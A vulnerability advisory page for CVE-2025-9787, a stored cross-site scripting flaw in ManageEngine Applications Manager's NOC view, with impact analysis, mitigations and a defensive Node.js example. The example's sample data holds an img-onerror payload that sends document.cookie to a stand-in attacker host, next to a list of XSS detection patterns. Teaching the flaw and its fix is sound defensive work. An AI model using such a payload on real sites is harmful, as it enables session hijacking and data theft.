CVE-2025-9787: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Zohocorp ManageEngine Applications Manager
Zohocorp ManageEngine Applications Manager versions 177400 and below are vulnerable to Stored Cross-Site Scripting vulnerability in the NOC view.
AI Analysis
Technical Summary
CVE-2025-9787 is a stored Cross-Site Scripting (XSS) vulnerability, CWE-79, in Zohocorp ManageEngine Applications Manager builds 177400 and below. It lies in the Network Operations Center (NOC) view: text supplied by an authenticated user with high privileges is stored by the server and later written into the NOC page without adequate neutralization (contextual output encoding), so script embedded in that text runs in the browser of every user who opens the view. Because the NOC view is typically left open on shared operations screens and visited by other operators and administrators, one stored payload executes repeatedly in their sessions. The payload can act as the victim within the Applications Manager UI: read monitoring data, change whatever configuration the victim is allowed to change, and, if the session cookie is not marked HttpOnly, read the cookie itself. The CVSS v3.1 base score is 6.1 (Medium): network attack vector (AV:N), low attack complexity (AC:L), high privileges required (PR:H), user interaction required (UI:R), scope unchanged (S:U). PR:H is the qualifier that matters in practice: the attacker must already hold a high-privilege account, so this is an administrator-to-administrator attack, useful to a malicious insider or to an attacker who has compromised one administrator account and wants to persist and reach the others. No exploitation in the wild is reported. The root cause is the usual one for CWE-79, untrusted text concatenated into HTML without encoding for the context it lands in. As of the published date no official patch has been linked; check the installed build number against 177400 and watch the vendor advisory for the fixed build.
Potential Impact
For European organizations, the likely consequences are disclosure of monitoring data (hostnames, topology, alert history), hijacking of privileged sessions, and use of those sessions to alter monitor configuration or silence alerts, which degrades operational visibility and control. Applications Manager is widely deployed for application and infrastructure monitoring and commonly holds credentials for the systems it monitors, so a compromised administrator session is a pivot point into the wider estate. Confidentiality and integrity impact are rated high. Availability impact is none: the flaw does not by itself cause denial of service, and a base score of 6.1 with the stated AV:N/AC:L/PR:H/UI:R/S:U metrics corresponds to A:N (the same vector with A:L would score 6.4). The high-privilege and user-interaction requirements narrow the attacker pool to existing administrators, or whoever controls their accounts, but in large deployments with many administrators sharing one NOC display the interaction requirement is trivially satisfied. A malicious or compromised administrator can use the flaw to persist and extend access across the other administrators. The absence of known exploits leaves a window for proactive mitigation before active attacks emerge.
Mitigation Recommendations
1. Check the installed build number (shown in the product's About dialog) and upgrade past build 177400 as soon as the vendor publishes a fixed build; until then, consider disabling or limiting use of the NOC view.
2. Restrict the ability to edit NOC view content to the minimum set of administrators, give each a personal account protected by multi-factor authentication (MFA), and remove shared administrator logins. With PR:H the attacker is an administrator, so account hygiene is the primary control.
3. Audit the content already stored for the NOC view (monitor names, labels, descriptions) for HTML markup or script fragments, and alert on administrator requests whose parameters contain tags, event-handler attributes or javascript: URLs.
4. Web Application Firewall (WAF) rules for common XSS payloads add a layer but are weak here: the payload arrives in an authenticated administrator's request and can be encoded to evade signatures, so do not treat them as the fix.
5. A Content Security Policy (CSP) that restricts script sources would block inline payloads, but a third-party product's UI may itself depend on inline scripts. Deploy CSP through a reverse proxy in Content-Security-Policy-Report-Only mode first and review violation reports before enforcing.
6. Confirm that the Applications Manager session cookie is set with the HttpOnly and Secure flags so that a payload cannot read it directly; note that the payload can still act within the victim's browser session.
7. Review custom dashboards and integrations for the same pattern, untrusted text concatenated into HTML without contextual output encoding, during code review and penetration testing.
8. Educate administrators not to paste content from untrusted sources into monitor names and labels, and to report unexpected behaviour in the NOC view.
9. Keep the host operating system, Java runtime and related components patched to reduce the attack surface.
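As an added example, not code from ManageEngine or from this advisory: the block below shows, in plain Node.js, the rendering mistake behind a stored XSS in a dashboard tile, the contextual output encoding that neutralizes it, and a heuristic audit check over stored values of the kind the audit recommendation above calls for. The monitor records, the attacker.invalid host and all function names are constructed for the example.

```javascript
// Added example (not ManageEngine code): the rendering pattern behind a stored
// XSS in a dashboard, the output-encoding fix, and an audit check for stored
// values. Runs under Node.js with no dependencies.

// Constructed sample records, as a NOC-style view might load them from the
// server. Record 3 holds a payload a privileged user saved as a display name.
const storedMonitors = [
  { id: 1, name: "web-frontend-01", status: "Critical" },
  { id: 2, name: "db-primary", status: "Clear" },
  {
    id: 3,
    name: '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
    status: "Clear",
  },
];

// Vulnerable pattern: stored text is concatenated straight into HTML, so the
// browser parses the attacker's <img> tag and runs its onerror handler.
function renderTileUnsafe(monitor) {
  return `<div class="tile ${monitor.status}">${monitor.name}</div>`;
}

// Contextual output encoding for the HTML text and double-quoted attribute
// contexts: every character that can open a tag, close an attribute or start
// an entity is replaced with its character reference.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened renderer: encode free text; allow-list the value that lands in an
// attribute rather than encoding it, because it is also stored input.
const KNOWN_STATUSES = new Set(["clear", "warning", "critical"]);
function renderTileSafe(monitor) {
  const status = String(monitor.status).toLowerCase();
  const cssClass = KNOWN_STATUSES.has(status) ? status : "unknown";
  return `<div class="tile ${cssClass}">${escapeHtml(monitor.name)}</div>`;
}

// Audit check for already-stored content: flags values carrying markup or
// script-bearing constructs. It is a heuristic for finding existing
// injections, not a substitute for encoding at render time.
const SUSPICIOUS_PATTERNS = [
  /<\s*\/?\s*[a-z]/i,   // any tag opener, e.g. <img, <script, </div
  /\bon[a-z]+\s*=/i,    // inline event handler, e.g. onerror=
  /javascript\s*:/i,    // javascript: URL scheme
  /&#x?[0-9a-f]+;?/i,   // numeric character reference hiding a payload
];
function findSuspiciousMonitors(monitors) {
  return monitors
    .filter((m) => SUSPICIOUS_PATTERNS.some((re) => re.test(String(m.name))))
    .map((m) => m.id);
}

// Demo output when run directly: node stored_xss_demo.js
for (const m of storedMonitors) {
  console.log("unsafe:", renderTileUnsafe(m));
  console.log("safe:  ", renderTileSafe(m));
}
console.log("suspicious ids:", findSuspiciousMonitors(storedMonitors));
```

The allow-list on the status value is deliberate: encoding protects the text node, but a value used as a class name or attribute is better restricted to known tokens than escaped, since an escaped but arbitrary string can still break the page's styling or be abused in CSS contexts.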
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: Zohocorp
- Date Reserved: 2025-09-01T09:56:49.733Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 69440f154eb3efac368cd713
Added to database: 12/18/2025, 2:26:29 PM
Last enriched: 12/18/2025, 2:42:21 PM
Last updated: 12/18/2025, 9:14:06 PM
Views: 8
Related Threats
- CVE-2023-53901: URL Redirection to Untrusted Site ('Open Redirect') in WBCE CMS (High)
- CVE-2023-53899: Server-Side Request Forgery (SSRF) (Medium)
- CVE-2025-67653: CWE-22 in Advantech WebAccess/SCADA (Medium)
- CVE-2025-62004: CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition in BullWall Server Intrusion Protection (High)
- CVE-2025-62003: CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition in BullWall Server Intrusion Protection (Medium)